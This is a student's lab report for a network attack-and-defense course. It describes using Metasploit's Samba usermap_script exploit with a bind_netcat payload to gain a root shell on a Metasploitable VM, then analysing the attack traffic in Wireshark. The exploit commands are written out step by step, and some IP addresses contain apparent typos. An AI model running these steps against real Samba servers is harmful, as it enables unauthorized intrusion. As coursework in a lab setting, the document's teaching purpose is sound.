20252821 2025-2026-2 《网络攻防实践》第7周作业

20252821 2025-2026-2 《网络攻防实践》第7周作业

1.实践内容

（1）使用Metasploit进行Linux远程渗透攻击

• 使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限

（2）攻防对抗实践

• 攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。
• 防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

查询kali虚拟机IP地址为192.168.200.3，Metasploit虚拟机IP地址为192.168.200.8

检查连通性，发现可以ping通

在kali虚拟机中输入指令msfconsole启动Metasploit

输入指令search samba查找要使用的漏洞模块

输入指令search usermap_script查找到要使用的usermap_script安全漏洞

输入指令use exploit/multi/samba/usermap_script进行渗透攻击

输入指令show payloads查看与该渗透攻击模块相兼容的攻击载荷

输入指令set payload cmd/unix/bind_netcat设置攻击载荷为bind_netcat
输入指令options查看需配置的参数

输入指令与对应的靶机和攻击机IP地址

点击查看代码

set RHOST 192.169.200.8//将Metasploitable虚拟机设置为靶机
set LHOST 192.168.200.3//将kali虚拟机设置为攻击机

输入指令exploit开始攻击，输入ifconfig查看网络信息，显示的是靶机的网络信息（IP地址192.168.200.8），攻击成功

2.2 攻防对抗实践

攻击方：kali虚拟机（192.168.200.3）
防守方：Metasploitable_ubuntu(192.168.200.8)
进行配置

打开wireshark准备抓包

输入指令exploit攻击成功后，wireshark监听到大量的网络流量数据包

输入指令shell和id查看shell权限账户及其所在的权限组

输入指令whoami查看到当前账户是root权限

在过滤栏输入ip.addr == 192.168.200.7 && ip.addr == 192.168.200.8过滤语句

可以看到：

• 源IP地址：192.168.200.3（攻击机）
• 目的IP地址：192.168.200.8（靶机）
• 目标端口：445（Samba服务默认端口）
• 主要协议：TCP、SMB协议
  追踪TCP流查看完整的攻击交互过程
  可以看到攻击机利用4444号端口与靶机建立telnet服务和攻击后输入的指令信息
  
  

3.学习中遇到的问题及解决

1. kali虚拟机和Metasploit虚拟机ping不通
   将Metasploit虚拟机网络改成Vnet8

2. Metasploit虚拟机渗透攻击不成功
   重新检查发现是因为Metasploit虚拟机的IP地址因为改变网络之后发现变化，从192.168.200.123变成了192.168.200.8

4.学习感想和体会

通过本次渗透测试实践，我将理论知识与实操技能深度结合，收获颇丰且感悟深刻。在Linux远程渗透攻击中，我熟练掌握了Metasploit框架的使用，从启动msfconsole到调用usermap_script渗透模块，再到配置参数、选择payload执行攻击，每一步都需严谨细致，也让我明白漏洞利用的核心的是精准把握系统弱点，如Samba服务的安全漏洞稍有疏忽便会导致攻击失败。
攻防对抗实践中，我既体验了攻击方获取权限的突破感，也体会了防守方监听分析的严谨性。攻击时，我学会利用Metasploitable靶机漏洞渗透并尝试提权；防守时，通过wireshark分析数据包，精准捕捉攻击细节。这让我深刻认识到网络安全的攻防平衡，攻击是为了发现漏洞，防守是为了筑牢防线。
此次实践不仅提升了我的实操能力，更让我树立了合法合规的安全意识，明白网络安全的重要性，也懂得唯有兼顾攻击与防守思维，才能真正守护网络环境安全。